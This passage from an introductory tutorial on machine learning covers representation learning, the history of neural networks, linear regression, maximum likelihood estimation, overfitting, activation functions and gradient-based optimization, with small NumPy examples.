<p><strong>Figure 2:</strong> Example of different representations: Suppose we want to separate two classes of data by drawing a line between them. If the data are represented in Cartesian coordinates (left) the task is impossible. On the other hand, when the same points are represented in polar coordinates (right), the task becomes very simple to solve with a vertical separator.</p>
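<p>As a minimal Python sketch of this idea (the ring radii and the cut value are illustrative, not taken from the figure), the transform to polar coordinates turns two concentric classes, inseparable by any straight line in Cartesian coordinates, into classes separable by a single threshold on \(r \):</p>

```python
import math

# Two toy classes: points on an inner ring (class 0) and an outer ring
# (class 1). No straight line separates them in Cartesian coordinates,
# but after the transform (x, y) -> (r, theta) the cut r > 1.5 does.
inner = [(math.cos(t), math.sin(t)) for t in (0.0, 1.0, 2.0, 3.0, 4.0, 5.0)]
outer = [(2 * math.cos(t), 2 * math.sin(t)) for t in (0.5, 1.5, 2.5, 3.5, 4.5, 5.5)]

def to_polar(x, y):
    """Return the polar-coordinate representation (r, theta) of (x, y)."""
    return math.hypot(x, y), math.atan2(y, x)

def classify(x, y, r_cut=1.5):
    """A 'vertical separator' in polar coordinates: threshold on r only."""
    r, _ = to_polar(x, y)
    return 1 if r > r_cut else 0

assert all(classify(x, y) == 0 for x, y in inner)
assert all(classify(x, y) == 1 for x, y in outer)
```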

<p>Many ML tasks can be efficiently solved by designing the right set of features for that task, and then providing these features to a simple machine learning algorithm. As an example, imagine we have a set of images of either grass fields or the sea. What feature can we design to separate the two groups of images? We could find the average color of all the pixels and if the average is close to green then we would label the photo as “grass”, while if it is close to blue as “sea”. We can be confident that with this simple feature we have extracted, the performance of our classification algorithm is likely to be adequate for this task.</p>
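<p>This hand-designed feature can be sketched in a few lines of Python (the pixel values and the green-versus-blue rule here are invented purely for illustration):</p>

```python
# Toy "images" as lists of (R, G, B) pixels; values are invented for
# illustration. The hand-crafted feature is the mean pixel color.
grass_image = [(30, 180, 40), (25, 200, 35), (35, 170, 50)]
sea_image = [(20, 60, 190), (15, 80, 210), (25, 70, 180)]

def mean_color(image):
    """Average each color channel over all pixels."""
    n = len(image)
    return tuple(sum(pixel[c] for pixel in image) / n for c in range(3))

def classify_scene(image):
    """Label 'grass' if green dominates the average color, 'sea' if blue does."""
    _, green, blue = mean_color(image)
    return "grass" if green > blue else "sea"

assert classify_scene(grass_image) == "grass"
assert classify_scene(sea_image) == "sea"
```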

<p>However, what happens if we pass each photo through a color filter, changing the color of the pixels? In this case, the algorithm breaks down completely. Yet, to a human eye, the classification task remains just as easy. So, how do we capture the “seaness” of the sea and the “grassness” of the grass? This is exactly where things get difficult. It is not obvious how to design a feature that captures, for example, the texture of the grass in terms of pixel values. This is where <em>representation learning</em>, also known as feature learning, comes in. It is a set of techniques that allows a system to automatically discover the representation needed for a specific problem, completely bypassing the need for hand-designed features. And as it turns out, learned representations often result in much better performance than hand-designed ones <a href="https://www.deeplearningbook.org">[Ref]</a>.</p>

<p>Deep learning is a form of representation learning and involves Neural Networks (NNs) with multiple layers. The NN learns hierarchical representations of data, i.e., from low-level features (e.g., edges in images) to high-level ones (e.g., faces, objects). Frank Rosenblatt is attributed with introducing the <em>perceptron</em> in 1958 <a href="https://doi.org/10.1037/h0042519">[Ref]</a>. Combining multiple of these perceptrons arranged in layers results in the so-called Multilayer Perceptron (MLP), also known as a Feedforward Neural Network (FNN). The first MLP trained by stochastic gradient descent <a href="https://doi.org/10.1214/aoms/1177729586">[Ref]</a> was published by Shun’ichi Amari in 1967 <a href="https://doi.org/10.1109/PGEC.1967.264666">[Ref]</a>. The ReLU (Rectified Linear Unit) activation function, introduced in 1969 by Kunihiko Fukushima <a href="https://doi.org/10.1109/TSSC.1969.300225">[Ref]</a>, has now become the most popular activation function for deep learning <a href="https://doi.org/10.48550/arXiv.1710.05941">[Ref]</a>. Finally, the modern form of backpropagation was first published in 1970 by Seppo Linnainmaa <a href="https://doi.org/10.1007/BF01931367">[Ref]</a>. The method applied to neural networks was popularized by David E. Rumelhart et al. in 1986 <a href="https://doi.org/10.1038/323533a0">[Ref]</a>.</p>

<p>During the 1990s, introduced by Yann LeCun <a href="https://doi.org/10.1109/5.726791">[Ref]</a>, Convolutional Neural Networks (CNNs) marked a major breakthrough. In his seminal work, he proposed the LeNet-5 architecture, which utilized convolutional layers to recognize hand-written digits from the MNIST database—a significant shift from traditional fully connected layers.</p>

<h3 id="the-revolution">The Revolution</h3>

<p>The ML/DL revolution was kick-started by CNN-based computer vision in 2012 <a href="https://papers.nips.cc/paper_files/paper/2012/hash/c399862d3b9d6b76c8436e924a68c45b-Abstract.html">[Ref]</a>, driven by advancements in computation, particularly the graphics processing unit. Although CNNs trained via backpropagation had existed for decades, and neural networks—including CNNs—had already been implemented on GPUs for years <a href="https://doi.org/10.1016/j.patcog.2004.01.013">[Ref]</a>, advancements in computer vision required faster GPU implementations. At the same time, in 2006, GPUs became programmable with Nvidia’s CUDA framework <a href="https://books.google.fr/books?id=49OmnOmTEtQC">[Ref]</a>. As deep learning gained widespread adoption, specialized hardware and optimized algorithms were subsequently developed to meet its growing demands <a href="https://doi.org/10.48550/arXiv.1703.09039">[Ref]</a>. In 2009, Rajat Raina et al. demonstrated an early example of GPU-accelerated deep learning by training a 100-million-parameter deep belief network using 30 Nvidia GeForce GTX 280 GPUs <a href="https://doi.org/10.1145/1553374.1553486">[Ref]</a>. Their approach achieved training speeds up to 70 times faster than traditional CPU-based methods.</p>

<p>Another reason why deep learning has only recently gained such traction is the availability of data in the era of “big data”. ML algorithms are data-driven and in fact need a large amount of data in order to be able to be trained and to generalize well on unseen data. With the increasing digitization of society, data became abundant. Furthermore, it was possible to gather all these records and curate them into large datasets appropriate for training ML models.</p>

<p>Finally, even more recently, advances in Natural Language Processing (NLP) are beginning to transform our everyday lives. This was largely initiated by a novel architecture called <em>transformer</em>, introduced by Google researchers in 2017 <a href="https://doi.org/10.48550/arXiv.1706.03762">[Ref]</a>, which was based mainly on the attention mechanism developed by Bahdanau et al. <a href="https://doi.org/10.48550/arXiv.1409.0473">[Ref]</a>. Based on the transformer architecture, Large Language Models (LLMs) can be constructed, containing billions of trainable parameters. One popular example is the chatbot “ChatGPT” <a href="https://openai.com/index/chatgpt/">[Ref]</a>, which has an impressive ability to respond to various questions, in diverse contexts, in a remarkably human-like manner. Ever since the introduction of the chatbot, the field of AI has increasingly been in the spotlight, driving advancements and drawing the interest of academia, industry, and the public. However, the true capabilities of LLMs remain insufficiently understood <a href="https://ml-site.cdn-apple.com/papers/the-illusion-of-thinking.pdf">[Ref]</a>.</p>

<h3 id="the-learning-procedure">The Learning Procedure</h3>

<p>We now turn to the fundamental concepts related to the process of training a machine learning model. ML has a diverse set of application tasks including classification, regression, clustering, anomaly detection, transcription, denoising, density estimation and more. Each of these tasks has different specific requirements and objectives and hence the training procedure is different and focuses on optimizing different evaluation metrics. However, in general, ML algorithms can be broadly categorized as unsupervised or supervised based on their learning process.</p>

<p><strong>Unsupervised learning algorithms</strong> have access to the entirety of a dataset containing various features, and learn useful properties and characteristics of the structure of this dataset. Clustering, for example, is possibly the most important unsupervised learning problem. It attempts to organize the elements of a dataset into groups which are similar in some way.</p>

<p>In high-energy physics, clustering plays a central role across many stages of data processing. For example, in pixel detectors, clustering is used to group adjacent hits in the sensor planes that are likely to have originated from the same charged particle, forming the basis for subsequent track reconstruction. Similar techniques are applied in calorimetry to group energy deposits and in jet reconstruction to cluster final-state particles.</p>

<p>While clustering is commonly framed as an unsupervised learning task, it can also appear in supervised or semi-supervised contexts, especially when the goal is to learn a model that mimics or improves upon a known clustering procedure, such as in learned jet tagging.</p>

<p><strong>Supervised learning algorithms</strong>, on the other hand, have access to a dataset but each element of that set has an associated <em>label</em>. For example, for a simple image classification task of animals, each image needs to have a label which specifies the animal that is the target of the classification.</p>

<p>Other learning paradigms exist such as semi-supervised learning and <em>reinforcement learning</em>. The former is when some examples in the dataset include supervision targets while others do not, while the latter is when the learning algorithm interacts with an environment, so there is a feedback loop between the learning system and its actions.</p>

<h4 id="example-linear-regression">Example: Linear Regression</h4>

<p>To give an example of how a learning algorithm works we walk through possibly the simplest learning algorithm: linear regression.</p>

<p>The goal of linear regression is to build a system that takes in a vector \(\mathbf{x} \in \mathbb{R}^n \) as input and predicts the value of a scalar \(y \in \mathbb{R} \) as its output. Let \(\hat{y}_i \) denote the value that our model predicts \(y \) should be for the example \(\mathbf{x}_i \). We define the output to be</p>

<p>\[
    \hat{y}_i = \mathbf{w}^\top \mathbf{x}_i + b\,,
\]</p>

<p>where \(\mathbf{w} \in \mathbb{R}^n \) and the scalar \(b \) are the parameters we are trying to learn. We can think of \(\mathbf{w} \) as the <em>weights</em> and \(b \) as the <em>bias</em>. We can further organize our dataset into a <em>design matrix</em> \(\mathbf{X} \), where the different examples \(\mathbf{x}_i \) are organized in the rows of the matrix, and each column corresponds to a different feature. For simplicity, we can set \(b=0 \). In terms of the design matrix, \(\hat{y} \) becomes a vector \((\hat{\mathbf{y}})_i = \hat{y}_i \) \(\forall i \), and:</p>

<p>\[
    \hat{\mathbf{y}} = \mathbf{X}\mathbf{w}\,.
\]</p>

<p>To make a learning algorithm we need to create an algorithm that can improve the weights \(\mathbf{w} \) in order to improve the performance of the model, when the algorithm is allowed to gain experience by observing the dataset. However, how do you evaluate the performance of the model? One way of doing this is to compute the Mean Square Error (MSE) between the predictions and the actual values:</p>

<p>\[
    \text{MSE} = \frac{1}{m} ||\hat{\mathbf{y}} - \mathbf{y}||^2
\]</p>

<p>\[
    = \frac{1}{m} \sum_{i=1}^m (\hat{\mathbf{y}} - \mathbf{y})_i^2
\]</p>

<p>where \(\mathbf{y} \) are the regression targets, and \(m \) is the size of the set over which we are doing this evaluation. Furthermore, because we want a fair evaluation, we want to evaluate our model on examples it has never seen before. This can be achieved by splitting the dataset into a <em>test</em> and a <em>train</em> set. During the learning procedure the algorithm only has access to the training set; afterwards, the model is evaluated solely on the test set.</p>

<p>Therefore, in order to now minimize \(\text{MSE}_ {\text{train}} \), known as the <em>loss function</em>, we can simply solve for where its gradient is \(\mathbf{0} \):</p>

<p>\[
    \nabla_{\mathbf{w}} \text{MSE}_{\text{train}} = \mathbf{0}
\]</p>

<p>\[
    \Rightarrow \nabla_{\mathbf{w}} ||\hat{\mathbf{y}}^{\text{(train)}} - \mathbf{y}^{\text{(train)}}||^2 = \mathbf{0}
\]</p>

<p>\[
    \Rightarrow \nabla_{\mathbf{w}} ||\mathbf{X}^{\text{(train)}} \mathbf{w} - \mathbf{y}^{\text{(train)}}||^2 = \mathbf{0}
\]</p>

<p>\[
    \Rightarrow \nabla_{\mathbf{w}} (\mathbf{X}^{\text{(train)}} \mathbf{w} - \mathbf{y}^{\text{(train)}})^\top (\mathbf{X}^{\text{(train)}} \mathbf{w} - \mathbf{y}^{\text{(train)}}) = \mathbf{0}
\]</p>

<p>\[
    \Rightarrow 2 \mathbf{X}^{\text{(train)}\top} \mathbf{X}^{\text{(train)}} \mathbf{w} - 2 \mathbf{X}^{\text{(train)}\top}\mathbf{y}^{\text{(train)}} = \mathbf{0}
\]</p>

<p>\[
    \Rightarrow \mathbf{w}  = \left( \mathbf{X}^{\text{(train)}\top} \mathbf{X}^{\text{(train)}} \right)^{-1} \mathbf{X}^{\text{(train)}\top}\mathbf{y}^{\text{(train)}}\,,
\]
assuming that \(\mathbf{X}^{\text{(train)}\top} \mathbf{X}^{\text{(train)}} \) is invertible. Evaluating the above equations constitutes a simple learning algorithm. However simple and limited this algorithm may be, it provides a good example of how a classical learning algorithm works.</p>
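<p>The closed-form solution above can be checked numerically. The following is a small sketch using NumPy (the dataset is synthetic and the dimensions are arbitrary); note that solving the normal equations directly is preferred over forming the explicit inverse:</p>

```python
import numpy as np

rng = np.random.default_rng(0)

# Synthetic training data: y = X w_true + small Gaussian noise
# (bias b = 0, as in the text). Dimensions are arbitrary.
m, n = 200, 3
w_true = np.array([1.5, -2.0, 0.5])
X_train = rng.normal(size=(m, n))
y_train = X_train @ w_true + 0.01 * rng.normal(size=m)

# Normal equations: w = (X^T X)^{-1} X^T y, solved without an explicit
# matrix inverse for numerical stability.
w_hat = np.linalg.solve(X_train.T @ X_train, X_train.T @ y_train)

# The learned weights recover the generating ones up to the noise level.
assert np.allclose(w_hat, w_true, atol=0.01)
```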

<p>From the previous example, one question naturally arises: Why did we choose to minimize the MSE and not some other function? For each problem, rather than guessing that some function may be appropriate as an estimator, we would like a systematic way of deciding its form. The most common such principle is the principle of maximum likelihood, and the method is known as Maximum Likelihood Estimation (MLE).</p>

<h4 id="maximum-likelihood-estimation">Maximum Likelihood Estimation</h4>

<p>We demonstrate the MLE method and give the set of probabilistic assumptions under which least-squares regression is derived as a very natural algorithm <a href="https://cs229.stanford.edu/main_notes.pdf">[Ref]</a>.</p>

<p>Let us assume that, in line with our previous equation for linear regression, the target variables and the input variables are related via the equation</p>

<p>\[
y_i = \mathbf{w}^\top \mathbf{x}_i + \epsilon_i\,,
\]</p>

<p>where \(\epsilon_i \) is the error term that captures random noise, or unmodeled effects. Let us further assume that these terms \( \epsilon_i \), given \(m \) observations, are independent and identically distributed (IID) random variables, and that they follow the Gaussian (or normal) distribution \(\epsilon_i \sim \mathcal{N}(0,\sigma^2) \). The probability density function is therefore as follows</p>

<p>\[
    p(\epsilon_i) = \frac{1}{\sqrt{2 \pi} \sigma} \exp \left(- \frac{\epsilon_i^2}{2 \sigma^2} \right) \,.
\]</p>

<p>This, given that \( \epsilon_i = y_i - \mathbf{w}^\top \mathbf{x}_i \), implies that</p>

<p>\[
    p(y_i | \mathbf{x}_i ; \mathbf{w}) =  \frac{1}{\sqrt{2 \pi} \sigma} \exp \left(- \frac{(y_i - \mathbf{w}^\top \mathbf{x}_i)^2}{2 \sigma^2} \right) \,,
\]</p>

<p>the probability that \(y_i \) will take a specific value, given the measurement of an example \(\mathbf{x}_i \) and parametrized by \(\mathbf{w} \).</p>

<p>Now, if we take into account all the measurements \(\mathbf{x}_i \), in other words given the design matrix \(\mathbf{X} \), what is the distribution of the \(y_i \)’s? Since we assumed independence, the probability will be a simple product of the respective probabilities for each observation:</p>

<p>\[
    p(\mathbf{y} | \mathbf{X}; \mathbf{w}) = \prod_{i=1}^m p(y_i | \mathbf{x}_i ; \mathbf{w}) 
\]</p>

<p>\[
    = \prod_{i=1}^m \frac{1}{\sqrt{2 \pi} \sigma} \exp \left( - \frac{(y_i - \mathbf{w}^\top \mathbf{x}_i)^2}{2 \sigma^2} \right ) \,,
\]</p>

<p>for \(m \) measurements \( \mathbf{x}_i \). We can view this function as a function of \(\mathbf{w} \), and in this case this function is known as the likelihood:</p>

<p>\[
    L (\mathbf{w}) = L (\mathbf{w}; \mathbf{X}, \mathbf{y})
\]</p>

<p>\[
    = \prod_{i=1}^m \frac{1}{\sqrt{2 \pi} \sigma} \exp \left( - \frac{(y_i - \mathbf{w}^\top \mathbf{x}_i)^2}{2 \sigma^2} \right) \,.
\]</p>

<p>Given this probabilistic model for the \(y_i \)’s based on the data points \( \mathbf{x}_ i \), what is the best way to choose the values for the parameters \( \mathbf{w} \)? The <em>principle of maximum likelihood</em> states that the parameters for which the observations are as highly probable as possible should be chosen. This is equivalent to maximizing the likelihood function \(L(\mathbf{w}) \).</p>

<p>The maximization of \(L(\mathbf{w}) \) is equivalent to the maximization of the logarithm of \(L(\mathbf{w}) \), since the logarithmic function is strictly increasing. Hence, we want to maximize the log likelihood \(l(\mathbf{w}) \):</p>

<p>\[
    l(\mathbf{w}) = \log L(\mathbf{w})
\]</p>

<p>\[
    =\log \prod_{i=1}^m \frac{1}{\sqrt{2 \pi} \sigma} \exp \left( - \frac{(y_i - \mathbf{w}^\top \mathbf{x}_i)^2}{2 \sigma^2} \right)
\]</p>

<p>\[
    = \sum_{i=1}^m \log \frac{1}{\sqrt{2 \pi} \sigma} \exp \left( - \frac{(y_i - \mathbf{w}^\top \mathbf{x}_i)^2}{2 \sigma^2} \right)
\]</p>

<p>\[ 
    = m \log \frac{1}{\sqrt{2\pi} \sigma} - \frac{1}{\sigma^2} \frac{1}{2} \sum_{i=1}^m (y_i - \mathbf{w}^\top \mathbf{x}_i)^2 \,.
\]
Hence, maximizing \(l(\mathbf{w}) \) is equivalent to minimizing</p>

<p>\[
    \sum_{i=1}^m (y_i - \mathbf{w}^\top \mathbf{x}_i)^2 \,,
\]</p>

<p>which we recognize to be our original least-squares (MSE) cost function.</p>

<p>Therefore, under the assumptions of Gaussian IID errors, the least-squares linear regression algorithm corresponds to the maximization of the likelihood function. Depending on the problem at hand, by a similar approach, one can prove that, for example, for a binary classification task, the most appropriate cost function is given by the binary cross entropy <a href="https://www.deeplearningbook.org">[Ref]</a>.</p>
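<p>This equivalence can also be illustrated numerically. Below is a sketch (synthetic data with invented dimensions and noise level) checking that the least-squares solution from the normal equations also minimizes the Gaussian negative log-likelihood:</p>

```python
import numpy as np

rng = np.random.default_rng(1)

# Synthetic data following the assumed model y_i = w^T x_i + eps_i,
# with Gaussian IID noise of standard deviation sigma.
m, n, sigma = 100, 2, 0.1
w_true = np.array([0.7, -1.2])
X = rng.normal(size=(m, n))
y = X @ w_true + sigma * rng.normal(size=m)

def neg_log_likelihood(w):
    """-log L(w) for the Gaussian model, following the derivation in the text."""
    resid = y - X @ w
    return m * np.log(np.sqrt(2 * np.pi) * sigma) + (resid @ resid) / (2 * sigma**2)

# Least-squares weights from the normal equations.
w_ls = np.linalg.solve(X.T @ X, X.T @ y)

# The least-squares solution attains a lower negative log-likelihood than
# nearby perturbations, as MLE under Gaussian IID errors predicts.
for _ in range(10):
    w_pert = w_ls + 0.05 * rng.normal(size=n)
    assert neg_log_likelihood(w_ls) < neg_log_likelihood(w_pert)
```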

<h4 id="generalization-overfitting-and-underfitting">Generalization, Overfitting, and Underfitting</h4>

<p>Another important challenge in this process, one of the most central ones, is to make the learning algorithm perform well on the test set, on <em>new, unseen</em> inputs, not only on the dataset that the model was trained on. In other words, we want the model to be able to <em>generalize</em>. In order to decide whether a model generalizes well, we compare the loss on the test set, \(\text{MSE}_ {\text{test}} \) in our example, with the loss on the training set, \(\text{MSE}_ {\text{train}} \). If the model generalizes well, we expect the error on the test set to be roughly the same as the error on the training set. If it does not, we speak of overfitting or underfitting. The former refers to the case where a model corresponds too closely to the dataset it was trained on, and hence performs poorly on new, unseen data. The latter refers to the case where a model cannot adequately capture the underlying structure of the data. In Fig. 3, examples of underfitting and overfitting are compared.</p>

<p>Furthermore, if the model’s deviations from the data are, on average, roughly the same size as the measurement uncertainties of the data points, that means the ML model is doing a “good-enough” fit of the data—i.e., it’s actually fitting the signal and not the noise. On the other hand, if the residuals are significantly smaller than the measurement uncertainties, this indicates that the model is also fitting random fluctuations and thus overfitting.</p>

<p><img src="/assets/ml-gnn-intro/underfitting-overfitting.png" alt="underfitting-overfitting" /></p>

<p><strong>Figure 3:</strong> Examples of underfitting and overfitting on a synthetically generated dataset with quadratic structure. Left: A linear fit cannot capture the curvature present in the data. Center: A quadratic fit generalizes well to unseen points and hence does not suffer from a significant amount of either underfitting or overfitting. Right: A polynomial fit of degree 19 suffers from strong overfitting. The solution passes exactly through many points in the dataset, however, the structure has not been correctly extracted, and the performance on unseen data will be poor.</p>
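<p>The behavior shown in Fig. 3 can be reproduced with a short NumPy sketch (the dataset, random seed, and split are illustrative; the degree-19 fit may emit a harmless rank warning):</p>

```python
import numpy as np

rng = np.random.default_rng(2)

# Synthetic data with quadratic structure plus noise, split into equal
# train and test sets.
x = rng.uniform(-3.0, 3.0, size=40)
y = 1.0 + 0.5 * x + 2.0 * x**2 + rng.normal(scale=1.0, size=40)
x_tr, y_tr = x[:20], y[:20]
x_te, y_te = x[20:], y[20:]

def heldout_mse(degree):
    """Fit a polynomial of the given degree on the train set and return
    its mean squared error on the held-out test set."""
    coeffs = np.polyfit(x_tr, y_tr, degree)
    pred = np.polyval(coeffs, x_te)
    return float(np.mean((pred - y_te) ** 2))

# Degree 1 underfits (misses the curvature), degree 19 overfits (chases
# the noise); the quadratic generalizes best.
assert heldout_mse(2) < heldout_mse(1)
assert heldout_mse(2) < heldout_mse(19)
```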

<h2 id="deep-learning">Deep Learning</h2>

<p>Deep feedforward networks, also known as MLPs, are the archetype of deep learning models. They are called deep because they have several layers and feedforward because of how the information is progressively fed into the successive layers, flowing towards the output. The term neural is a remnant of the models’ origins in neuroscience, specifically the McCulloch-Pitts neuron <a href="https://doi.org/10.1007/BF02478259">[Ref]</a>, a simplified model of the biological neuron that can be used as a form of computing element. However, the modern use in deep learning no longer draws these parallels from biology. Finally, these models are called networks because they are typically represented by combining and chaining various neurons together.</p>

<p>A feedforward neural network with three hidden layers is shown in Fig. 4. In our example, input, hidden and output layers have \(n \), \(m \) and \(k \) units, respectively. Moreover, we can see that the network is fully-connected since every neuron of a layer is connected to every neuron in neighboring layers.</p>

<p><img src="/assets/ml-gnn-intro/nns.png" alt="nns" /></p>

<p><strong>Figure 4:</strong> Illustration of a deep feedforward neural network, highlighting its input, output and hidden layers. Adapted from <a href="https://tikz.net/neural_networks/">[Ref]</a>.</p>

<p>One way to understand neural networks is to consider the limitations of linear models. The obvious problem with linear models is that they are limited to linear functions. In order to extend linear models to approximate nonlinear functions of \(x \), we can apply the linear model not to \(\mathbf{x} \) itself but to a transformed input \(\phi(\mathbf{x}) \), where \(\phi \) is a nonlinear transformation. We can think of this function \(\phi \) as providing a new representation of \(\mathbf{x} \).</p>

<p>So how can this nonlinear transformation \(\phi \) be chosen? We already saw that in classical ML approaches, this is hand-crafted by the engineer. However, here, since deep learning is a type of representation learning, the goal is to learn this transformation \(\phi \). If we assume that this transformation depends on some set of parameters \(\mathbf{w} \), then we can learn what these parameters have to be for a good representation.</p>

<p>So how do we do this? We start from our input say \(\mathbf{x} \). For linear regression, we had:</p>

<p>\[
    f(\mathbf{x}; \mathbf{w},b) = \mathbf{x}^\top \mathbf{w} + b\,.
\]</p>

<p>The output of this model is a scalar even though the input is a vector. However, if we wanted a multidimensional output, where the linear parameters \(\mathbf{w} \) are different for each dimension, we can organize the parameters in a matrix \(\mathbf{W} \) such that:</p>

<p>\[
    \mathbf{h}(\mathbf{x}; \mathbf{W}, \mathbf{b}) = \mathbf{W} \mathbf{x} + \mathbf{b}\,,
\]</p>

<p>where now we have a different bias, i.e., additive constant, \((\mathbf{b})_i \) for each output dimension.</p>

<p>Finally, to overcome the defect of linear models, we use a nonlinear function after this affine transformation. This nonlinear function is known as the <em>activation function</em> and can be denoted by \(\mathbf{g} \). Therefore, our model now is as follows:</p>

<p>\[
    \mathbf{h}(\mathbf{x}; \mathbf{W}, \mathbf{b}) = \mathbf{g} (\mathbf{W} \mathbf{x} + \mathbf{b} ) \,,
\]</p>

<p>where \(\mathbf{g} \) is applied element-wise. The nonlinear function \(\phi \) now comprises an affine transformation based on the learnable parameters \(\mathbf{W} \) and \(\mathbf{b} \), and a fixed nonlinear function \(\mathbf{g} \). The parameters are adjusted during training, while the form of the activation \(\mathbf{g} \) is chosen beforehand. These operations are also summarized in Fig. 5.</p>

<p><img src="/assets/ml-gnn-intro/nn_operations.png" alt="nn_operations" /></p>

<p><strong>Figure 5:</strong> The operations between the input and the first hidden layer. Weights are denoted as \(w \), biases as \(b \), and the activation function as \(g \). The element-wise, vector version of the activation is denoted by \(\mathbf{g} \). Adapted from <a href="https://tikz.net/neural_networks/">[Ref]</a>.</p>
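<p>As a concrete illustration of the operations in Fig. 5, the sketch below computes a single hidden layer \(\mathbf{h} = \mathbf{g}(\mathbf{W}\mathbf{x} + \mathbf{b}) \) in NumPy. The dimensions (a 4-dimensional input mapped to 3 hidden units) and the choice of ReLU as \(\mathbf{g} \) are illustrative assumptions, not taken from the text.</p>

```python
import numpy as np

rng = np.random.default_rng(0)

# Illustrative sizes: a 4-dimensional input mapped to 3 hidden units.
x = rng.normal(size=4)        # input vector x
W = rng.normal(size=(3, 4))   # weight matrix W (one row per output dimension)
b = rng.normal(size=3)        # bias vector b

def relu(z):
    """Element-wise activation g, here chosen as ReLU."""
    return np.maximum(0.0, z)

# h(x; W, b) = g(Wx + b): affine transformation followed by the activation.
h = relu(W @ x + b)
print(h.shape)  # (3,)
```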

<p>Various popular activations are plotted in Fig. 6. ReLU has only nonnegative values and is defined as \(\text{ReLU}(x) = \max(0,x) \). It is computationally efficient and mitigates the vanishing gradient problem, making it the default activation for various deep learning architectures. However, it suffers from the so-called “dying ReLU” problem, where neurons can become completely inactive and only output zero for all inputs.</p>

<p>The sigmoid function is defined as \(\sigma (x) = 1/(1+e^{-x}) \), taking values between 0 and 1. While historically important, sigmoid activations are prone to the vanishing gradient problem for large absolute values of the input, which can hamper the training of deep networks, unless intermediate layers designed to avoid this are introduced.</p>

<p>The hyperbolic tangent is defined as \(\tanh (x) = (e^x - e^{-x} )/(e^x + e^{-x}) \) so the function takes values between \(-1 \) and 1. The function is zero-centered which can help with convergence compared to the sigmoid. Nonetheless, it still suffers from vanishing gradients for large inputs.</p>

<p>Finally, the swish function \(\text{swish} (x) = x/(1+e^{-x}) \) <a href="https://doi.org/10.48550/arXiv.1710.05941">[Ref]</a> is an attempt to interpolate between the linear function and the ReLU function. Swish has been shown to outperform ReLU in some deep architectures, especially in deeper models. However, it is computationally more expensive, which can be a serious drawback in resource-constrained settings.</p>

<p><img src="/assets/ml-gnn-intro/activations.png" alt="activations" /></p>

<p><strong>Figure 6:</strong> Popular activation functions.</p>
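<p>The four activations of Fig. 6 can be written directly from their definitions above; a minimal NumPy sketch:</p>

```python
import numpy as np

def relu(x):
    # ReLU(x) = max(0, x), applied element-wise
    return np.maximum(0.0, x)

def sigmoid(x):
    # sigma(x) = 1 / (1 + e^{-x}), values in (0, 1)
    return 1.0 / (1.0 + np.exp(-x))

def tanh(x):
    # tanh(x) = (e^x - e^{-x}) / (e^x + e^{-x}), values in (-1, 1)
    return np.tanh(x)

def swish(x):
    # swish(x) = x / (1 + e^{-x}) = x * sigmoid(x)
    return x * sigmoid(x)

x = np.array([-2.0, 0.0, 2.0])
print(relu(x), sigmoid(0.0), tanh(0.0), swish(0.0))
```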

<p>A neural network is nothing more than a composition of these successive transformations. So, for a \(k \)-layer neural network that returns a scalar, the combined action of the neural network \(f_{\text{NN}} \) on an input \(\mathbf{x} \) is simply:</p>

<p>\[
    y = f_{\text{NN}} (\mathbf{x}) = f_k ( \boldsymbol{f}_{k-1} ( \cdots \boldsymbol{f}_2 ( \boldsymbol{f}_1 ( \mathbf{x})))) \,,
\]</p>

<p>where \(\boldsymbol{f}_l \), for the layer index \(l = 1,\ldots,k-1 \), are functions with vector output of the form:</p>

<p>\[
    \boldsymbol{f}_l (\mathbf{z}) = \mathbf{g_l} (\mathbf{W}_l \mathbf{z} + \mathbf{b}_l) \,,
\]</p>

<p>where \(\mathbf{W}_l \) are the weights between layers \(l \) and \(l-1 \), \(\mathbf{g_l} \) and \(\mathbf{b}_l \) are the activation and biases, respectively, of layer \(l \),
while \(f_k \) returns a scalar.</p>
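<p>The chained form \(f_k(\boldsymbol{f}_{k-1}(\cdots \boldsymbol{f}_1(\mathbf{x}))) \) can be sketched as a simple loop over layers. The layer sizes and the choice of activations below are illustrative assumptions:</p>

```python
import numpy as np

rng = np.random.default_rng(1)
relu = lambda z: np.maximum(0.0, z)
identity = lambda z: z  # no activation on the final, scalar-output layer

def forward(x, params, activations):
    """Apply f_l(z) = g_l(W_l z + b_l) for each layer in sequence."""
    z = x
    for (W, b), g in zip(params, activations):
        z = g(W @ z + b)
    return z

# Illustrative 2-layer network: 4 inputs -> 5 hidden units -> 1 output.
params = [
    (rng.normal(size=(5, 4)), rng.normal(size=5)),  # W_1, b_1
    (rng.normal(size=(1, 5)), rng.normal(size=1)),  # W_2, b_2
]
y = forward(rng.normal(size=4), params, [relu, identity])
print(y.shape)  # (1,)
```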

<p>The remarkable result of the universal approximation theorem <a href="https://doi.org/10.1016/0893-6080(89)90020-8">[Ref]</a> states that, under mild assumptions on the activation functions used for the neural network, any continuous function \(f : [0, 1]^n \rightarrow [0, 1] \) can in fact be approximated arbitrarily well by a neural network with <em>as few as one</em> hidden layer and with a finite number of weights. By adding more layers, we increase the complexity of the model and hence its capacity to approximate a complex function, as well as to generalize. At the same time, however, we increase the computational cost of the algorithm, and therefore the development of DL models is always a trade-off between these two aspects. By learning the parameters of these models, we can essentially learn how to solve any task, along with the representations needed for that specific task.</p>

<p>In order for the learning process to happen, a loss function, similarly to the MSE loss in our linear regression example, is needed. Depending on the problem, a suitable form can be chosen using the MLE method. The weights and biases have then to be chosen such that this function is minimized. This is most frequently done using a form of gradient-based optimization.</p>

<h4 id="gradient-based-optimization">Gradient-Based Optimization</h4>

<p>Optimization, in general, refers to the minimization or maximization of an <em>objective function</em> \(J \), a more general term for what we have been calling the loss function so far. In more general optimization problems—including reinforcement learning and economic modeling—the objective function may take a different form from the loss functions encountered previously, and the goal may instead be to maximize it, such as maximizing a reward signal or economic profit.</p>

<p>For the case of neural networks, we are minimizing the prediction error of the model, and this objective function is called a loss function. It is a smooth differentiable function of the parameters \(\boldsymbol{\theta} \) of the model. In addition, even though it has multiple inputs, for the concept of “minimization” to make sense, there must be only one output, i.e., \(J : \mathbb{R}^n \rightarrow \mathbb{R} \). In order to minimize \(J(\boldsymbol{\theta}) \), we need to find the direction, in the \(n \)-dimensional parameter space, in which \(J \) decreases the fastest, and move in that direction. Since, by the definition of the gradient, \(\nabla_{\boldsymbol{\theta}} J (\boldsymbol{\theta}) \) gives the direction in which \(J \) increases the fastest, we have to update \(\boldsymbol{\theta} \) by going in the opposite direction:</p>

<p>\[
    \boldsymbol{\theta} \leftarrow \boldsymbol{\theta} - \alpha \nabla_{\boldsymbol{\theta}} J(\boldsymbol{\theta}) \,,
\]</p>

